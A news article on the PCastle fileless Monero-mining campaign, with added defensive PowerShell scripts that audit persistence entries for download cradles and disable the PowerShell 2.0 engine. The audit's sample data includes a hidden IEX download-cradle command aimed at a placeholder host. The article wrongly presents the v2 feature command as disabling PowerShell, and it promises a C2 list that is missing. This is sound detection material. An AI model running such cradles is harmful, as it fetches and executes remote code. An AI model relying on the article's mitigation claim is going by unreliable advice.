Mainstream anti-malware vendor Trend Micro recently revealed the existence of PCastle, a fileless Monero cryptocurrency-mining malware campaign launched against China. Once again, the attackers' favorite tool is Windows PowerShell. Apart from developers and system administrators, PowerShell is one of the least-used Windows features among non-technical end users, yet it is one of the most frequently abused by malware authors. PCastle's largest install base, 92%, consists entirely of Chinese computers, but no specific industry targets were observed.
Like the WannaCry ransomware of 2017, PCastle also has a module that takes advantage of the EternalBlue exploit as part of its propagation strategy. If the machine is patched against that exploit (a patch is available even for Windows XP), PCastle instead resorts to a "pass the hash" attack to brute-force its way deep into the Windows operating system. Once it has obtained administrative privileges from the logged-in user account, it creates a scheduled task and Windows registry entries that instruct the computer to download the malware's main module, again using PowerShell scripting.
The downloaded scripts are not written to the file system; instead, they operate only in RAM. This makes the infection difficult to detect, given its "fileless" nature. Only antivirus products with advanced heuristic scanning capabilities can potentially block the loading of the malware's main module into the computer's memory. Since the contents of RAM are flushed on every reboot, the malware hijacks the Windows Task Scheduler to reinstall itself into memory at a fixed interval.
It performs a self-check to confirm that persistence survives a reboot; once that is guaranteed, it again uses Windows PowerShell to download the cryptocurrency miner module from the command-and-control servers. The version of the miner installed by PowerShell varies with the machine's architecture: both 32-bit and 64-bit versions of the Monero mining module are available, with 32-bit Windows receiving the 32-bit module and 64-bit Windows the 64-bit one.
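The persistence described above (a scheduled task and Run-key entries that relaunch a PowerShell download cradle after each reboot) leaves traces in places a defender can audit even when the payload itself never touches disk. The script below is an added example written for this article; it is not code from Trend Micro or from the PCastle analysis. It scores scheduled-task actions and Run-key values against generic fileless-PowerShell indicators (encoded commands, hidden windows, execution-policy bypass, download cradles, in-memory execution). The indicator patterns, the function names, and the sample entries (including the `c2.invalid` placeholder host) are all constructed for illustration and are not PCastle indicators of compromise; the script runs offline against the constructed entries by default and only scans the live host when `$Live` is set to `$true`.

```powershell
# Added example (not from the article or Trend Micro): audit scheduled tasks and
# Run keys for PowerShell launch lines that look like fileless download cradles.
# Indicator patterns are generic, constructed for this example; not PCastle IoCs.

$Live = $false   # $true: collect from this host; $false: use constructed samples

$Indicators = [ordered]@{
    EncodedCommand = '(?i)(^|\s)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
    HiddenWindow   = '(?i)(^|\s)-w(indowstyle)?\s+hidden'
    PolicyBypass   = '(?i)(^|\s)-e(p|x|xec|xecutionpolicy)\s+bypass'
    NoProfile      = '(?i)(^|\s)-nop(rofile)?\b'
    NonInteractive = '(?i)(^|\s)-noni(nteractive)?\b'
    DownloadCradle = '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|BitsTransfer)'
    InMemoryExec   = '(?i)(\biex\b|Invoke-Expression)'
}

# Returns the names of every indicator that matches one command line.
function Get-PowerShellCradleIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($name in $Indicators.Keys) {
        if ($CommandLine -match $Indicators[$name]) { $name }
    }
}

# Collects persistence entries from the live host: task actions and Run keys.
function Get-PersistenceCommands {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if ($a.Execute) {   # skip COM-handler actions, which have no command line
                [pscustomobject]@{
                    Source  = "Task:$($task.TaskPath)$($task.TaskName)"
                    Command = "$($a.Execute) $($a.Arguments)".Trim()
                }
            }
        }
    }
    foreach ($key in 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run') {
        if (Test-Path $key) {
            foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
                if ($p.Name -notmatch '^PS') {   # drop the provider's PSPath etc.
                    [pscustomobject]@{ Source = "Reg:$key\$($p.Name)"; Command = [string]$p.Value }
                }
            }
        }
    }
}

# Flags an entry when it launches PowerShell and trips at least two indicators.
function Invoke-PersistenceAudit {
    param([Parameter(Mandatory)][object[]]$Entries)
    foreach ($e in $Entries) {
        $hits = @(Get-PowerShellCradleIndicators -CommandLine $e.Command)
        $invokesPS = $e.Command -match '(?i)\b(powershell|pwsh)(\.exe)?\b'
        [pscustomobject]@{
            Source     = $e.Source
            Suspicious = ($invokesPS -and $hits.Count -ge 2)
            Indicators = ($hits -join ', ')
            Command    = $e.Command
        }
    }
}

# Constructed sample entries (placeholder base64 and a .invalid host; not real data).
$SampleEntries = @(
    [pscustomobject]@{ Source = 'Task:\Microsoft\Windows\UpdateCheck'
        Command = 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB' }
    [pscustomobject]@{ Source = 'Reg:HKCU:\...\Run\sys'
        Command = 'powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://c2.invalid/m.ps1'')"' }
    [pscustomobject]@{ Source = 'Task:\Backup\Nightly'
        Command = 'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup.ps1' }
    [pscustomobject]@{ Source = 'Reg:HKLM:\...\Run\Updater'
        Command = '"C:\Program Files\Vendor\Updater.exe" /silent' }
)

$entries = if ($Live) { Get-PersistenceCommands } else { $SampleEntries }
Invoke-PersistenceAudit -Entries $entries | Format-Table Source, Suspicious, Indicators -AutoSize -Wrap
```

Against the constructed samples the first two entries are flagged (five and three indicators respectively) while the signed backup script trips only `NoProfile` and the vendor updater trips nothing. The two-indicator threshold is a deliberate trade-off: legitimate automation often uses `-NoProfile` or `-NonInteractive` alone, whereas a hidden window combined with an encoded or downloaded payload is the shape of the chain described above.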
“Algorithms for Monero mining are not as resource-intensive compared to other miners, and don’t require a lot of processing power. This means they can illicitly mine the cryptocurrency without alerting users unless they notice certain red flags like performance issues,” explained Janus Agcaoli, Trend Micro’s Threat Response Engineer, in the company's official blog.
Upon further inspection, Trend Micro’s engineers found that the PowerShell script downloads its malicious files from the following command-and-control servers, which also serve as the malware’s “software repository”:
Trend Micro strongly recommends disabling PowerShell, as it is not needed by home users and non-technical end users. PowerShell being available by default on all versions of Windows 10 places all of its users at great risk. We also strongly recommend that our readers using Windows 10 disable PowerShell; it is just a command-line interface that is more feature-rich than CMD.exe but is not needed by an ordinary user.
The easiest way to disable PowerShell is to open PowerShell with administrative privileges, copy and paste the command below, and press the Enter key:
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
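For an administrator applying this on more than one machine, it helps to record the feature state before and after the change and to confirm which PowerShell engines can still be started afterwards. The script below is an added example written for this article, not code from Trend Micro or from the article's author. It wraps the command above in a before/after check; `MicrosoftWindowsPowerShellV2Root` is the optional feature for the Windows PowerShell 2.0 engine, so the final probes start `powershell.exe` with `-Version 2.0` and `-Version 5.0` to show which engines remain available. The function names are this example's own; it must be run from an elevated PowerShell session on Windows 10.

```powershell
# Added example (not from the article): disable the PowerShell 2.0 engine feature
# with a recorded before/after state, then probe which engines can still start.
# Run from an elevated (administrator) PowerShell session.

$FeatureName = 'MicrosoftWindowsPowerShellV2Root'   # the feature the article's command targets

# Current DISM state of the feature: Enabled, Disabled, or DisabledWithPayloadRemoved.
function Get-PSv2FeatureState {
    (Get-WindowsOptionalFeature -Online -FeatureName $FeatureName).State
}

# Applies the article's command, suppressing the automatic reboot, and reports the change.
function Disable-PSv2Engine {
    $before = Get-PSv2FeatureState
    if ($before -ne 'Enabled') {
        return [pscustomobject]@{ Feature = $FeatureName; Before = $before; After = $before; RestartNeeded = $false }
    }
    $result = Disable-WindowsOptionalFeature -Online -FeatureName $FeatureName -NoRestart
    [pscustomobject]@{
        Feature       = $FeatureName
        Before        = $before
        After         = Get-PSv2FeatureState
        RestartNeeded = [bool]$result.RestartNeeded
    }
}

# Tries to start a specific engine version; a missing engine makes powershell.exe exit non-zero.
function Test-EngineVersion {
    param([Parameter(Mandatory)][string]$Version)
    $reported = & powershell.exe -NoProfile -NonInteractive -Version $Version `
        -Command '$PSVersionTable.PSVersion.ToString()' 2>$null
    [pscustomobject]@{
        Requested = $Version
        Available = ($LASTEXITCODE -eq 0 -and -not [string]::IsNullOrWhiteSpace("$reported"))
        Reports   = "$reported".Trim()
    }
}

Disable-PSv2Engine | Format-List
'2.0', '5.0' | ForEach-Object { Test-EngineVersion -Version $_ } | Format-Table -AutoSize
```

The `Reports` column shows the version string each engine returns when it does start, which is the quickest way to see what the feature change did and did not remove on a given host. Keep the `RestartNeeded` value from the first object: on some builds the engine is not fully unloaded until the next reboot, so a host that reports `RestartNeeded = True` should be probed again after restarting.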